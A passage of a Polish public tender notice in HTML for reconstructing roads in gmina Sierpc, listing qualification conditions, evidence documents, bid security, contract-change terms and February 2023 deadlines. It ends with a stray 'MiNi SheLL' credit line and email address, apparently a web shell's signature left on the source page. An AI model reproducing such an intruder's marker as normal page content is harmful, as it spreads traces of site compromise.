kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. Złożyli ofertę niepodlegającą odrzuceniu na podstawie art. 226 ust. 1 ustawy Pzp;<br/>1.2. Nie podlegają wykluczeniu na zasadach określonych w SWZ;<br/>1.3. Spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli jest ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż<br/>4.000.000,00 zł (słownie: cztery miliony złotych).<br/><br/>4) zdolności technicznej lub zawodowej:<br/>a) W zakresie osób zdolnych do wykonania zamówienia.<br/>Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponować<br/>następującymi osobami:<br/>- co najmniej jedną osobą posiadającą kwalifikacje zawodowe do sprawowania funkcji<br/>projektanta posiadającego uprawnienia do pełnienia funkcji technicznych w budownictwie<br/>w zakresie projektowania w specjalności drogowej;<br/>- co najmniej jedną osobą posiadającą kwalifikacje zawodowe niezbędne do sprawowania funkcji<br/>kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi<br/>w specjalności drogowej.<br/><br/>Dopuszczalne jest łączenie tych funkcji.<br/><br/><br/>b) W zakresie doświadczenia zawodowego niezbędnego do wykonania zamówienia.<br/>Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie:<br/>- co najmniej 1 roboty budowlanej polegającej na budowie, modernizacji<br/>lub przebudowie drogi o nawierzchni bitumicznej o długości nie mniejszej niż 1000 mb<br/>wykonanej nie wcześniej niż w okresie ostatnich 5 (pięciu) lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą:<br/>1.1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – składane na podstawie art. 125 ust. 1 ustawy PZP<br/><br/>2. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą jeśli dotyczą:<br/>2.1. Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z postępowania<br/><br/>3. Podmiotowe środki dowodowe składane przez wykonawcę na wezwanie:<br/>3.1. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>3.2. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp,<br/>3.3. Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej kasy Rolniczego ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne w zakresie<br/>art. 109 ust. 1 pkt 1 ustawy<br/>3.4. Opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 4.000.000,00 zł<br/>3.5. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego<br/><br/>4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/><br/>5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne.<br/><br/>6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą:<br/>1.1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – składane na podstawie art. 125 ust. 1 ustawy PZP<br/><br/>2. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą jeśli dotyczą:<br/>2.1. Oświadczenie Podmiotu udostępniającego zasoby dotyczące spełniania warunków udziału w postępowaniu<br/>2.2. Zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia<br/><br/>3. Podmiotowe środki dowodowe składane przez wykonawcę na wezwanie:<br/>3.1. Wykaz robót budowlanych obejmujący wykonanie co najmniej 1 roboty budowlanej<br/>polegającej na budowie, modernizacji lub przebudowie drogi o nawierzchni bitumicznej<br/>o długości nie mniejszej niż 1000 mb wykonanej nie wcześniej niż w okresie ostatnich<br/>5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie. Wykaz ten<br/>powinien obejmować rodzaj wykonanych robót, długość odcinka drogi, datę wykonania, miejsce<br/>wykonania i nazwę podmiotu, na rzecz którego roboty te zostały wykonane. Do wykazu robot<br/>budowlanych należy dołączyć dowody określające, czy te roboty budowlane zostały wykonane<br/>należycie, oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i<br/>prawidłowo ukończone przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty. Wskazany wyżej wykaz robót Wykonawcy stanowi jedynie<br/>minimalne wymagania dla spełnienia warunku udziału w postępowaniu.<br/><br/>3.2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego skierowanych przez wykonawcę do realizacji zamówienia publicznego, wskazujący<br/>w szczególności: co najmniej jedną osobę posiadającą uprawnienia do kierowania robotami<br/>budowlanymi w specjalności drogowej i co najmniej jedną osobę posiadającą kwalifikacje<br/>zawodowe do sprawowania funkcji projektanta posiadającego uprawnienia do pełnienia funkcji<br/>technicznych w budownictwie w zakresie projektowania w specjalności drogowej. Wykaz powinien obejmować imię i nazwisko osoby, która będzie<br/>posiadać w/w uprawnienia, informację dotyczącą podstawy dysponowania osobą, kwalifikacje<br/>zawodowe, wykształcenie, zakres wykonywanych czynności, doświadczenie.<br/>Do wykazu należy dołączyć dokumenty potwierdzające posiadanie uprawnień budowlanych<br/>w zakresie projektowania w specjalności drogowej oraz aktualne zaświadczenie<br/>o członkostwie we właściwych izbach samorządu zawodowego jak również dokumenty<br/>potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi<br/>w specjalności drogowej oraz aktualne zaświadczenie o członkostwie we właściwych izbach<br/>samorządu zawodowego. Wskazany wyżej wykaz personelu Wykonawcy stanowi jedynie<br/>minimalne wymagania dla spełnienia warunku udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dowód potwierdzający wniesienie wadium.<br/>2. Pełnomocnictwo<br/>- w przypadku złożenia oferty wspólnej pełnomocnictwo udzielone liderowi;<br/>- gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych<br/>(KRS, CEiDG lub innego właściwego rejestru), wykonawca który składa ofertę<br/>za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument<br/>pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty<br/>lub do złożenia oferty i podpisania umowy;<br/>- upoważnienie (pełnomocnictwo) musi w swej treści jednoznacznie wskazywać<br/>uprawnienia do podpisania oferty lub do podpisania oferty i umowy.<br/>3. Umowa konsorcjum<br/>4. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275),<br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta winna być zabezpieczona wadium w wysokości 60.000,00 zł<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium<br/>w formie pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu<br/>składania ofert.<br/><br/>3. Wadium musi obejmować okres związania ofertą tj. do dnia 07.03.2023 roku<br/>licząc od dnia upływu terminu składania ofert.<br/><br/>4. Wykonawca może wnieść wadium w:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(j.t.: Dz. U. z 2020 r. poz. 299 oraz z 2022 r. poz. 807 i 1079).<br/><br/>5. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić<br/>wadium przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Starej Białej<br/>Oddział w Sierpcu, nr konta: 52 9015 0001 2005 0000 0521 0012, z dopiskiem na<br/>przelewie:<br/>„Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/>dotyczącej zamówienia p.n.: „Przebudowa dróg na terenie gminy Sierpc”.<br/><br/>6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które<br/>w wyznaczonym terminie składania ofert znajduje się na wskazanym rachunku bankowym<br/>Zamawiającego.<br/><br/>7. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie<br/>wadium w pieniądzu na rachunek bankowy Zamawiającego.<br/><br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/><br/>9. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, wykonawca składa<br/>oryginał dokumentu w postaci elektronicznej załączając go do oferty. Dokument ten<br/>powinien być podpisany kwalifikowanym podpisem elektronicznym przez jego wystawcę.<br/>Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każdym<br/>pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą,<br/>zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo<br/>do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty.<br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale XIV pkt. 2.1. i 2.2.<br/>SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz oświadczenie o spełnianiu warunków udziału w zakresie, w jakim każdy<br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/><br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy zgodnie z załącznikiem nr 4 do SWZ.<br/><br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Rozliczenie za wykonanie przedmiotu Umowy odbędzie się w 2 (dwóch) transzach na podstawie faktury VAT zaliczkowej i faktury VAT końcowej.<br/>Pierwsza transza wynagrodzenia zostanie przekazana Wykonawcy, w formie zaliczki<br/>na poczet realizacji przedmiotu Umowy, w wysokości 5% wynagrodzenia<br/>za wykonanie przedmiotu umowy. Zaliczka zostanie przekazana na wniosek Wykonawcy,<br/>zawierający nazwę zadania, wysokość kwoty zaliczki, numer rachunku bankowego, na który<br/>mają zostać wypłacone środki, na podstawie faktury VAT zaliczkowej. Zapłata zaliczki<br/>zostanie zrealizowana w terminie do 30 dni od daty złożenia wniosku i faktury VAT<br/>zaliczkowej Zamawiającemu. Rozliczenie zaliczki nastąpi poprzez złożenie w/w dokumentów<br/>najpóźniej do dnia zakończenia robót. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość zmiany umowy w szczególności w sytuacji:<br/>1) realizacji, przez dotychczasowego wykonawcę, dodatkowych robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z wyjątkiem należycie uzasadnionych przypadków;<br/>2) jeżeli konieczność zmiany umowy, w tym w szczególności zmiany wysokości ceny, spowodowana<br/>jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł<br/>przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny<br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>3) wystąpienia zmian powszechnie obowiązujących przepisów prawa<br/>4) w zakresie dotyczącym zmiany wynagrodzenia w przypadku ustawowej zmiany stawki<br/>podatku od towarów i usług (VAT);<br/>5) w zakresie dotyczącym zmiany wynagrodzenia w przypadku wystąpienia robót zamiennych<br/>i/lub zaniechanych, i/lub dodatkowych;<br/>6) wystąpienia konieczności zmiany osób wskazanych w ofercie<br/>przy pomocy, których Wykonawca realizuje przedmiot umowy;<br/>7) w przypadku zmiany danych Wykonawcy lub Zamawiającego<br/>8) jeżeli nastąpi brak możliwości wykonania robót budowlanych z powodu nie dopuszczenia do ich wykonania lub nakazania ich wstrzymania przez organ nadzoru budowlanego z przyczyn niezależnych od Wykonawcy;<br/>9) zmiany terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy,<br/>10) wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi<br/>okolicznościami:<br/>a) „siła wyższa” uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym<br/>opisem, w tym ograniczenia wprowadzone decyzjami władz publicznych;<br/>b) rezygnacją przez Zamawiającego z realizacji części przedmiotu umowy.<br/>11) gdy konieczność wprowadzenia zmian będzie następstwem zmian, wytycznych lub zaleceń<br/>instytucji, która przyznała środki na sfinansowanie zamówienia;<br/>12) zmiany terminów płatności wynikające z wszelkich zmian wprowadzonych do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com